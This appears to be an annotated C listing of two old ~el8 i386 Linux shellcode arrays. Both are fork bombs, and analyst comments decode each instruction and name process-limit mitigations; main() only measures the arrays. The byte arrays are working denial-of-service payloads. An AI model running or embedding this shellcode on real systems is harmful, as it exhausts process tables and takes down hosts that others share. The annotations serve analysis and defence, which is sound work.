/***********************************************
* released under (E) licensing ... *
* (E) RULES AND REGULATIONS *
* permission to use/rewrite/add : granted *
* permission to trojan/steal : denied *
* permission to use illegally : denied *
* permission to use on /dev/urandom : denied *
***********************************************/
/* contact el8@press.co.jp for full license */
/* code copyrighted by ~el8 -- don't infringe! */
#include <stdio.h>
#include <string.h>
/*
* ~el8 shellcode !!!!!!!
*
*/
/*
 * Analyst notes. Syscall names below assume the Linux i386 int $0x80 ABI
 * (number in %eax, arguments in %ebx, %ecx) -- TODO confirm target platform.
 *
 *   bytes  0..21  loop body: syscall 2 (fork), then %al = 0x25 (syscall 37,
 *                 kill) with %ebx = 0 and %ecx = 0x11 (signal 17, SIGCHLD on
 *                 Linux x86); `loop` branches back to byte offset 4.
 *   bytes 22..55  sets up a frame, writes {2, 0} and {0, 0} into 16 bytes
 *                 below %ebp and issues syscall 0xa2 (162, nanosleep) with
 *                 %ebx and %ecx pointing at those two 8-byte slots.
 *   bytes 56..64  syscall 1 (exit) with %ebx = 1.
 *   byte  65      0x00 terminator.
 *
 * NOTE(review): %ecx is reloaded with 0x11 on every pass before `loop`
 * decrements it, so the branch looks always-taken and bytes 22..64 look
 * unreachable -- verify under a debugger or emulator before relying on this.
 *
 * Net effect is repeated fork(), i.e. process-table exhaustion (a local
 * denial of service). Per-user process limits (RLIMIT_NPROC) or a cgroup
 * pids limit bound the impact.
 *
 * The body contains no zero bytes, so strlen() in main() counts every byte
 * up to the trailing 0x00. main() only measures this array; nothing in this
 * file executes it.
 */
unsigned char shellcode[] =
{
0x31, 0xc9, /* xorl %ecx,%ecx */
0x41, /* incl %ecx */
0x41, /* incl %ecx -- %ecx = 2 */
0x31, 0xc0, /* xorl %eax,%eax -- byte offset 4, the loop target */
0xb0, 0x02, /* movb $0x2,%al -- syscall number 2 (fork) */
0xcd, 0x80, /* int $0x80 */
0xb0, 0x25, /* movb $0x25,%al -- low byte = 0x25 (syscall 37, kill) */
0x31, 0xdb, /* xorl %ebx,%ebx -- first argument = 0 */
0x89, 0xd9, /* movl %ebx,%ecx */
0xb1, 0x11, /* movb $0x11,%cl -- second argument = 0x11 (17) */
0xcd, 0x80, /* int $0x80 */
0xe2, 0xee, /* loop 4 -- decrement %ecx, branch to offset 4 if nonzero */
0x55, /* pushl %ebp */
0x89, 0xe5, /* movl %esp,%ebp */
0x53, /* pushl %ebx */
0x31, 0xc0, /* xorl %eax,%eax */
0x31, 0xc9, /* xorl %ecx,%ecx */
0x41, /* incl %ecx */
0x41, /* incl %ecx -- %ecx = 2 */
0xb0, 0xa2, /* movb $0xa2,%al -- syscall number 162 (nanosleep) */
0x89, 0x4d, 0xf0, /* movl %ecx,0xfffffff0(%ebp) -- -16(%ebp) = 2 */
0x31, 0xc9, /* xorl %ecx,%ecx */
0x89, 0x4d, 0xf4, /* movl %ecx,0xfffffff4(%ebp) -- -12(%ebp) = 0 */
0x89, 0x4d, 0xf8, /* movl %ecx,0xfffffff8(%ebp) -- -8(%ebp) = 0 */
0x89, 0x4d, 0xfc, /* movl %ecx,0xfffffffc(%ebp) -- -4(%ebp) = 0 */
0x8d, 0x5d, 0xf0, /* leal 0xfffffff0(%ebp),%ebx -- first argument = &-16(%ebp) */
0x8d, 0x4d, 0xf8, /* leal 0xfffffff8(%ebp),%ecx -- second argument = &-8(%ebp) */
0xcd, 0x80, /* int $0x80 */
0x31, 0xc9, /* xorl %ecx,%ecx */
0x41, /* incl %ecx -- %ecx = 1 */
0x89, 0xcb, /* movl %ecx,%ebx -- first argument = 1 */
0x89, 0xc8, /* movl %ecx,%eax -- syscall number 1 (exit) */
0xcd, 0x80, /* int $0x80 */
0x00 /* terminator: lets strlen() measure the array; not an instruction */
};
/*
 * Analyst notes. Syscall name assumes the Linux i386 int $0x80 ABI -- TODO
 * confirm target platform.
 *
 * Eight bytes that issue syscall 2 (fork) and jump straight back to byte
 * offset 0, with no exit path: an unbounded fork loop (process-table
 * exhaustion, a local denial of service). Per-user process limits
 * (RLIMIT_NPROC) or a cgroup pids limit bound the impact.
 *
 * main() only measures this array; nothing in this file executes it.
 */
unsigned char smallcode[] =
/* a _much_ smaller version (no exit().. or exit for that matter :-) */
{
0x31, 0xC0, /* xorl %eax, %eax */
0xB0, 0x02, /* movb $2,%al -- syscall number 2 (fork) */
0xCD, 0x80, /* int $0x80 */
0xEB, 0xF8, /* jmp -8 -- short jump back to byte offset 0 (author's label: baq_and_touch_yourself) */
0x00 /* trailing zero byte so strlen() can measure the array */
};
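/*
 * Print, for each payload array, its string length (bytes before the first
 * 0x00), then its total size in decimal and in hex.
 *
 * The arrays are only measured here; they are never executed.
 *
 * Changes from the original listing:
 *   - identifiers that the HTML export had wrapped across lines are rejoined;
 *   - main() uses the standard (void) signature, the old parameters were unused;
 *   - strlen() returns size_t, so it is printed with %zu rather than %i, and
 *     the glibc-only %Zi/%Zx are replaced by the standard %zu/%zx;
 *   - the unsigned char arrays are cast to const char * for strlen().
 */
int main(void)
{
    printf("1(%zu,%zu 0x%zx)\n", strlen((const char *)shellcode),
           sizeof(shellcode), sizeof(shellcode));
    printf("2(%zu,%zu 0x%zx)\n", strlen((const char *)smallcode),
           sizeof(smallcode), sizeof(smallcode));
    return 0;
}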